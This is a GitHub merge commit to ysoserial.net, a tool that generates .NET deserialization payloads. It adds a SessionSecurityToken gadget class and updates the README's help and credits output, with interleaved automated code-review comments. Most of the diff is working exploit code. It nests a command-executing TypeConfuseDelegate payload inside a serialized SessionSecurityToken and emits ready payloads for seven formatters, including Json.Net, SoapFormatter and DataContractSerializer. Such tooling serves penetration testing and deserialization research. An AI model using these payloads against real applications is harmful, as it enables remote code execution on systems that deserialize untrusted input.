
Merge pull request #56 from irsdl/master

New gadget, bug fixing, typo fixing
pwntester committed Feb 7, 2020
2 parents a40abcf + 91d7d2c commit 9cb75edc3b5b2ee92d587dbdecb5451738c0b125
@@ -24,50 +24,53 @@ This software is a personal project and not related with any companies, includin
## Usage
```
$ ./ysoserial -h
Missing arguments.
ysoserial.net generates deserialization payloads for a variety of .NET formatters.
Available gadgets:
ActivitySurrogateDisableTypeCheck (Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.)
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter, SoapFormatter
ActivitySurrogateSelectorFromFile (Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
ActivitySurrogateSelector (This gadget ignores the command parameter and executes the constructor of ExploitClass class.)
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, LosFormatter
BinaryFormatter, LosFormatter, ObjectStateFormatter, SoapFormatter
ActivitySurrogateSelector (This gadget ignores the command parameter and executes the constructor of ExploitClass class.)
ActivitySurrogateSelectorFromFile (Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, LosFormatter
BinaryFormatter, LosFormatter, ObjectStateFormatter, SoapFormatter
ObjectDataProvider (ObjectDataProvider gadget)
Formatters:
Xaml, Json.Net, FastJson, JavaScriptSerializer, XmlSerializer, DataContractSerializer, YamlDotNet < 5.0.0, FsPickler
DataContractSerializer, FastJson, FsPickler, JavaScriptSerializer, Json.Net, Xaml, XmlSerializer, YamlDotNet < 5.0.0
TextFormattingRunProperties (TextFormattingRunProperties gadget)
PSObject (PSObject gadget. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017))
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter, SoapFormatter
PSObject (PSObject gadget. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017))
SessionSecurityToken (SessionSecurityTokenGenerator (System.IdentityModel.Tokens namespace) gadget)
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, DataContractSerializer, Json.Net, LosFormatter, NetDataContractSerializer, ObjectStateFormatter, SoapFormatter
TextFormattingRunProperties (TextFormattingRunProperties gadget)
Formatters:
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter, SoapFormatter
TypeConfuseDelegate (TypeConfuseDelegate gadget)
Formatters:
BinaryFormatter, ObjectStateFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter
TypeConfuseDelegateMono (TypeConfuseDelegate gadget - Tweaked to work with Mono)
Formatters:
BinaryFormatter, ObjectStateFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter
WindowsClaimsIdentity (WindowsClaimsIdentity (Microsoft.IdentityModel.Claims namespace) gadget)
Formatters:
BinaryFormatter, Json.Net, DataContractSerializer, NetDataContractSerializer, SoapFormatter
BinaryFormatter, DataContractSerializer, Json.Net, NetDataContractSerializer, SoapFormatter
WindowsIdentity (WindowsIdentity gadget)
Formatters:
BinaryFormatter, Json.Net, DataContractSerializer, NetDataContractSerializer, SoapFormatter
BinaryFormatter, DataContractSerializer, Json.Net, NetDataContractSerializer, SoapFormatter
Available plugins:
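Review bot: the new SessionSecurityToken entry in this usage block describes the gadget as "SessionSecurityTokenGenerator (System.IdentityModel.Tokens namespace) gadget", but Description() in the added SessionSecurityTokenGenerator.cs returns "SessionSecurityTokenGenerator gadget", so the README no longer matches what `./ysoserial -h` actually prints. Since this section is pasted tool output, settle the description in the generator first (the other entries describe the gadget, not the generator class, e.g. "WindowsIdentity (WindowsIdentity gadget)") and then regenerate the block from the binary instead of editing it by hand. The same applies to the alphabetical re-sorting of every "Formatters:" line here: SupportedFormatters() in the new generator still returns an unsorted list, so check whether the help printer sorts the names or whether this block will drift again on the next regeneration.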
@@ -195,21 +198,25 @@ Special thanks to all contributors:

## Credits
```
$ ./ysoserial.exe --credit
ysoserial.net has been developed by Alvaro Muñoz (@pwntester)
Credits for available formatters:
ActivitySurrogateDisableTypeCheck
Nick Landers
ActivitySurrogateSelectorFromFile
James Forshaw
ActivitySurrogateSelector
James Forshaw
ActivitySurrogateSelectorFromFile
James Forshaw
ObjectDataProvider
Oleksandr Mirosh and Alvaro Munoz
TextFormattingRunProperties
Oleksandr Mirosh and Alvaro Munoz
PSObject
Oleksandr Mirosh and Alvaro Munoz
SessionSecurityToken
Soroush Dalili
TextFormattingRunProperties
Oleksandr Mirosh and Alvaro Munoz
TypeConfuseDelegate
James Forshaw
TypeConfuseDelegateMono
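Review bot: the credit line added for SessionSecurityToken reads "Soroush Dalili", but Credit() in the new SessionSecurityTokenGenerator returns "Soroush Dalili, @mufinnnnnnn", so this block no longer reproduces the `./ysoserial.exe --credit` output it claims to show. Regenerate it from the binary rather than editing it by hand; while doing so, the heading "Credits for available formatters:" above a list of gadget names is worth correcting to say gadgets.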
@@ -243,6 +250,7 @@ Credits for available plugins:
Various other people have also donated their time and contributed to this project.
Please see https://github.com/pwntester/ysoserial.net/graphs/contributors to find those who have helped developing more features or have fixed bugs.
```

## Additional Reading
@@ -367,7 +367,7 @@ public override object Generate(string cmd, string formatter, Boolean test, Bool
}";
if (minify)
{
payload = Helpers.YamlDotNet.Minify(payload);
payload = Helpers.YamlDocumentMinifier.Minify(payload);
}

if (test)
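Review bot: the call site is switched from Helpers.YamlDotNet.Minify to Helpers.YamlDocumentMinifier.Minify, but this diff shows no change to the helper itself and no other callers; confirm that Helpers.YamlDotNet.Minify no longer exists (or is otherwise unreferenced) so the rename does not leave two minifiers with diverging behaviour, and that YamlDocumentMinifier.Minify takes the single argument used here: `payload = Helpers.YamlDocumentMinifier.Minify(payload);`.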
@@ -0,0 +1,265 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.Serialization;
using System.Xml;
using Newtonsoft.Json;
using System.Runtime.Serialization.Formatters.Soap;
using ysoserial.Helpers;
using System.IdentityModel.Tokens;
using System.Text.RegularExpressions;

namespace ysoserial.Generators
{
class SessionSecurityTokenGenerator : GenericGenerator
{
public override string Description()
{
return "SessionSecurityTokenGenerator gadget";
// Although it looks similar to WindowsIdentityGenerator but "actor" does not work in this context
}

public override List<string> SupportedFormatters()
{
return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "Json.Net", "DataContractSerializer", "NetDataContractSerializer", "SoapFormatter", "LosFormatter" };
}

public override string Name()
{
return "SessionSecurityToken";
}

public override string Credit()
{
return "Soroush Dalili, @mufinnnnnnn";
}


[Serializable]
public class SessionSecurityTokenMarshal : ISerializable
{
public SessionSecurityTokenMarshal(string b64payload)
{
B64Payload = b64payload;
}

private string B64Payload { get; }

public void GetObjectData(SerializationInfo info, StreamingContext context)
{
info.SetType(typeof(SessionSecurityToken));
MemoryStream stream = new MemoryStream();

using (XmlDictionaryWriter xmlDictionaryWriter = XmlDictionaryWriter.CreateBinaryWriter(stream, null, null))
{
xmlDictionaryWriter.WriteStartElement("SecurityContextToken", "");

xmlDictionaryWriter.WriteStartElement("Version", "");
xmlDictionaryWriter.WriteValue("1");
xmlDictionaryWriter.WriteEndElement();

xmlDictionaryWriter.WriteElementString("SecureConversationVersion", "", (new Uri("http://schemas.xmlsoap.org/ws/2005/02/sc")).AbsoluteUri);

xmlDictionaryWriter.WriteElementString("Id", "", "1");

WriteElementStringAsUniqueId(xmlDictionaryWriter, "ContextId", "", "1");

xmlDictionaryWriter.WriteStartElement("Key", "");
xmlDictionaryWriter.WriteBase64(new byte[] { 0x01 }, 0, 1);
xmlDictionaryWriter.WriteEndElement();

WriteElementContentAsInt64(xmlDictionaryWriter, "EffectiveTime", "", 1);
WriteElementContentAsInt64(xmlDictionaryWriter, "ExpiryTime", "", 1);
WriteElementContentAsInt64(xmlDictionaryWriter, "KeyEffectiveTime", "", 1);
WriteElementContentAsInt64(xmlDictionaryWriter, "KeyExpiryTime", "", 1);

xmlDictionaryWriter.WriteStartElement("ClaimsPrincipal", "");
xmlDictionaryWriter.WriteStartElement("Identities", "");
xmlDictionaryWriter.WriteStartElement("Identity", "");
xmlDictionaryWriter.WriteStartElement("BootStrapToken", "");
xmlDictionaryWriter.WriteValue(B64Payload); // This is where the payload is
xmlDictionaryWriter.WriteEndElement();
xmlDictionaryWriter.WriteEndElement();
xmlDictionaryWriter.WriteEndElement();
xmlDictionaryWriter.WriteEndElement();

xmlDictionaryWriter.WriteEndElement();
xmlDictionaryWriter.Flush();

stream.Position = 0;

//Console.WriteLine(Encoding.ASCII.GetString(stream.ToArray()));

info.AddValue("SessionToken", stream.ToArray());

}
}

private void WriteElementContentAsInt64(XmlDictionaryWriter writer, String localName, String ns, long value)
{
writer.WriteStartElement(localName, ns);
writer.WriteValue(value);
writer.WriteEndElement();
}

private void WriteElementStringAsUniqueId(XmlDictionaryWriter writer, String localName, String ns, string id)
{
writer.WriteStartElement(localName, ns);
writer.WriteValue(id);
writer.WriteEndElement();
}

}

private string GetB64SessionToken(string b64encoded)
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
string ndc_serialized = ysoserial.Helpers.DevTest.SerializersHelper.NetDataContractSerializer_serialize(obj);
Regex b64SessionTokenPattern = new Regex(@"\<SessionToken[^>]+>([^<]+)");
Match b64SessionTokenMatch = b64SessionTokenPattern.Match(ndc_serialized);
return b64SessionTokenMatch.Groups[1].Value;
}

public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
{
Generator binaryFormatterGenerator = new TypeConfuseDelegateGenerator();
byte[] binaryFormatterPayload = (byte[])binaryFormatterGenerator.Generate(cmd, "BinaryFormatter", false, minify);
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
return Serialize(obj, formatter, test, minify);
}
else if (formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
return Serialize(obj, formatter, test, minify);
}
else if (formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
return Serialize(obj, formatter, test, minify);
}
else if (formatter.ToLower().Equals("json.net"))
{

string payload = "{'$type': 'System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'SessionToken':{'$type':'System.Byte[], mscorlib','$value':'" + GetB64SessionToken(b64encoded) + "'}}";

if (minify)
{
payload = Helpers.JSONMinifier.Minify(payload, new string[] { "System.IdentityModel" }, null);
}


if (test)
{
try
{
Object obj = JsonConvert.DeserializeObject<Object>(payload, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
catch
{
}
}
return payload;
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{

string payload = $@"<root type=""System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""><SessionSecurityToken xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""http://schemas.datacontract.org/2004/07/System.IdentityModel.Tokens"">
<SessionToken i:type=""x:base64Binary"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken>
</SessionSecurityToken></root>";

if (minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}

if (test)
{
try
{
var xmlDoc = new XmlDocument();
xmlDoc.LoadXml(payload);
XmlElement xmlItem = (XmlElement)xmlDoc.SelectSingleNode("root");
var s = new DataContractSerializer(Type.GetType(xmlItem.GetAttribute("type")));
var d = s.ReadObject(new XmlTextReader(new StringReader(xmlItem.InnerXml)));
}
catch
{
}
}
return payload;
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{

string payload = $@"<root><w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" z:Id=""1"" z:Type=""System.IdentityModel.Tokens.SessionSecurityToken"" z:Assembly=""System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns="""">
<SessionToken z:Type=""System.Byte[]"" z:Assembly=""0"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken>
</w></root>";

if (minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}

if (test)
{
try
{
var xmlDoc = new XmlDocument();
xmlDoc.LoadXml(payload);
XmlElement xmlItem = (XmlElement)xmlDoc.SelectSingleNode("root");
var s = new NetDataContractSerializer();
var d = s.ReadObject(new XmlTextReader(new StringReader(xmlItem.InnerXml)));
}
catch
{
}
}
return payload;
}
else if (formatter.ToLower().Equals("soapformatter"))
{

string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:SessionSecurityToken id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.IdentityModel.Tokens/System.IdentityModel%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089"">
<SessionToken href=""#ref-3""/>
</a1:SessionSecurityToken>
<SOAP-ENC:Array id=""ref-3"" xsi:type=""SOAP-ENC:base64"">{GetB64SessionToken(b64encoded)}</SOAP-ENC:Array>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";

if (minify)
{
payload = XMLMinifier.Minify(payload, null, null, Helpers.FormatterType.SoapFormatter);
}

if (test)
{
try
{
byte[] byteArray = System.Text.Encoding.ASCII.GetBytes(payload);
MemoryStream ms = new MemoryStream(byteArray);
SoapFormatter sf = new SoapFormatter();
sf.Deserialize(ms);
}
catch
{
}
}
return payload;
}
else
{
throw new Exception("Formatter not supported");
}
}
}
}

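Review bot: GetB64SessionToken, the private helper directly above Generate, recovers the base64 SessionToken bytes by serializing a SessionSecurityTokenMarshal with NetDataContractSerializer and then scraping the XML with `new Regex(@"\<SessionToken[^>]+>([^<]+)")`, which is a full serializer round trip plus a regex over XML just to get back the byte[] that GetObjectData already has in `stream.ToArray()`. Factor the XmlDictionaryWriter block out of GetObjectData into a method returning that byte[]; GetObjectData passes it to `info.AddValue("SessionToken", ...)` and the Json.Net, DataContractSerializer, NetDataContractSerializer and SoapFormatter branches call Convert.ToBase64String on it. That removes the regex, the dependency on ysoserial.Helpers.DevTest.SerializersHelper, and the silent empty string that `b64SessionTokenMatch.Groups[1].Value` yields when the match fails, which would currently produce a syntactically valid but empty payload with no error. Smaller points in the same file: the comment in Description() sits after the return statement, so move it above the return where it will be read; the three identical branches for binaryformatter, losformatter and objectstateformatter can be a single `||` condition; the later branches compare with `formatter.ToLower().Equals(...)` while the first three use StringComparison.OrdinalIgnoreCase, so pick one style; and the commented-out `Console.WriteLine(Encoding.ASCII.GetString(...))` debug line would not compile if re-enabled because System.Text is not imported (the SoapFormatter branch uses the fully qualified System.Text.Encoding instead).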